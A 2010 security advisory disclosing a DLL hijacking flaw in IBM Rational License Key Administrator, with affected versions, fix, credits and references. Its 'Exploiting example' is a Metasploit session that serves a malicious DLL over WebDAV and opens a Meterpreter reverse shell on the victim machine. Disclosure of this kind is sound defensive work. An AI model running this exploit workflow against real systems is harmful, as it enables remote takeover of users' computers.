Advisory: IBM Rational License Key Administrator - DLL Hijacking [Update: 30.08.2010]
- in a nutshell:
---------------------------------------------
IBM Rational License Key Administrator - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------
- IBM Rational License Key Administrator Description
The IBM Rational® License Key Administrator (LKAD) is installed with many IBM Rational products and with your IBM Rational License Server software. This application provides an interface to IBM Rational Common Licensing (powered by FLEXlm software). Use the LKAD or the LKAD wizard to enter or import license keys and change your license configuration.
- Insecure Library Loading Allows Remote Code Execution
This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS upd"
For more vulnerability details please check the links in the reference section.
- Affected Versions
2002.05.00 (included in AppScan 9) - other releases may also be affected.
Update: 7.0.0.0 fixed
- Solution
It is not known if there are fixed releases available.
Updates to 7.0.0.0 or later should fix this issue.
- Credits
The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at
- Timeline
29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure
- Reference
http://www-01.ibm.com/software/rational/
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories
- Exploiting example:
msf exploit(webdav_dll_hijacker) > set EXTENSIONS upd
EXTENSIONS => upd
msf exploit(webdav_dll_hijacker) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS upd yes The list of extensions to generate
SHARENAME documents yes The name of the top-level share.
SRVHOST 10.8.28.9 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 10.8.28.9 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(webdav_dll_hijacker) >
[*] 10.8.28.55:49253 PROPFIND /documents
[*] 10.8.28.55:49253 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 PROPFIND /documents
[*] 10.8.28.55:49253 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND /
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 PROPFIND /documents/IBFS32.DLL
[*] 10.8.28.55:49253 PROPFIND => 207 File (/documents/IBFS32.DLL)
[*] 10.8.28.55:49253 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49253 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49253 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 GET => DLL Payload
[*] 10.8.28.55:49253 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49253 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 6 opened (10.8.28.9:4444 -> 10.8.28.55:49256) at Sun Aug 29 21:24:02 +0200 2010
msf exploit(webdav_dll_hijacker) > sessions -i 6
[*] Starting interaction with 6...
meterpreter > getuid
Server username: m1k3-Vista\m1k3
Recent comments
3 weeks 3 days ago
3 weeks 5 days ago
4 weeks 3 days ago
4 weeks 3 days ago
9 weeks 6 days ago
10 weeks 2 days ago
10 weeks 3 days ago
11 weeks 2 days ago
11 weeks 2 days ago
11 weeks 3 days ago